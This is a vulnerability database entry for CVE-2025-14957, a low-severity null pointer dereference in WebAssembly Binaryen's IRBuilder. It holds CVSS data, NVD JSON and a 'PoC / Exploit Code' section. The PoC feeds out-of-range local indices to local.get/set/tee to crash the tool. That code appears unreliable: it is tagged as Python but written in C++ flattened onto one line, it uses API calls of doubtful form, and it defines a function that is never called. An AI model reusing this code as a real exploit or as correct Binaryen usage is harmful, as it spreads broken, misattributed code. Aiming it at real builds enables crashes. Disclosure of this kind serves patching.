Security Vulnerability Report
中文
CVE-2025-14957 CVSS 3.3 LOW

CVE-2025-14957

Published: 2025-12-19 17:15:52
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was identified in WebAssembly Binaryen up to 125. This affects the function IRBuilder::makeLocalGet/IRBuilder::makeLocalSet/IRBuilder::makeLocalTee of the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Such manipulation of the argument Index leads to null pointer dereference. Local access is required to approach this attack. The exploit is publicly available and might be used. The name of the patch is 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying a patch is advised to resolve this issue.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:* - VULNERABLE
WebAssembly Binaryen < 125
WebAssembly Binaryen <= 125

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14957 PoC - IRBuilder Null Pointer Dereference // Target: WebAssembly Binaryen <= 125 // Function: IRBuilder::makeLocalGet/makeLocalSet/makeLocalTee #include <wasm-tools.h> #include <fstream> #include <iostream> // Generate malicious WAT with invalid local index std::string generateMaliciousWat() { return R"( (module (func $test_invalid_local_get (result i32) ;; Attempt to access non-existent local at index 9999 (local.get 9999) ) (func $test_invalid_local_set ;; Attempt to set non-existent local (local.set 9999 (i32.const 42)) ) (func $test_invalid_local_tee (result i32) ;; Attempt to tee non-existent local (local.tee 9999 (i32.const 100)) ) ) )"; } void triggerVulnerability(const std::string& wat_content) { // Parse WAT to Wasm using wat2wasm equivalent auto input = wasm::parseWat("test.wat", wat_content); if (!input) { std::cerr << "Parse failed" << std::endl; return; } // This will trigger null pointer dereference in IRBuilder wasm::PassRunner runner; runner.addDefaultOptimizationPasses(); runner.run(&input); } int main() { std::string malicious_wat = generateMaliciousWat(); triggerVulnerability(malicious_wat); return 0; } // Alternative: Direct Binaryen API trigger void triggerViaBinaryenAPI() { using namespace wasm; Module wasmModule; Builder builder(wasmModule); Function* func = builder.makeFunction( "trigger", {}, // no params {Type::i32}, // return i32 {} ); // Create IRBuilder and trigger null dereference IRBuilder builder2(wasmModule); builder2.setFunction(func); // This call with invalid index triggers the vulnerability Expression* localGet = builder2.makeLocalGet(99999, Type::i32); // Null pointer dereference occurs here func->body = localGet; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14957", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:51.657", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in WebAssembly Binaryen up to 125. This affects the function IRBuilder::makeLocalGet/IRBuilder::makeLocalSet/IRBuilder::makeLocalTee of the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Such manipulation of the argument Index leads to null pointer dereference. Local access is required to approach this attack. The exploit is publicly available and might be used. The name of the patch is 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying a patch is advised to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "versionEndIncluding": "125", "matchCriteriaId": "27C7E818-339C-468E-98CC-AA9C726F7C63"}]}]}], "references": [{"url": "https://github.com/WebAssembly/binaryen/", "source": "[email protected]"}, {"url": "https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WebAssembly/binaryen/issues/8090", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/WebAssembly/binaryen/pull/8099", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/oneafter/1204/blob/main/af1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://vuldb.com/?ctiid.337593", "source": "cna@vul ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.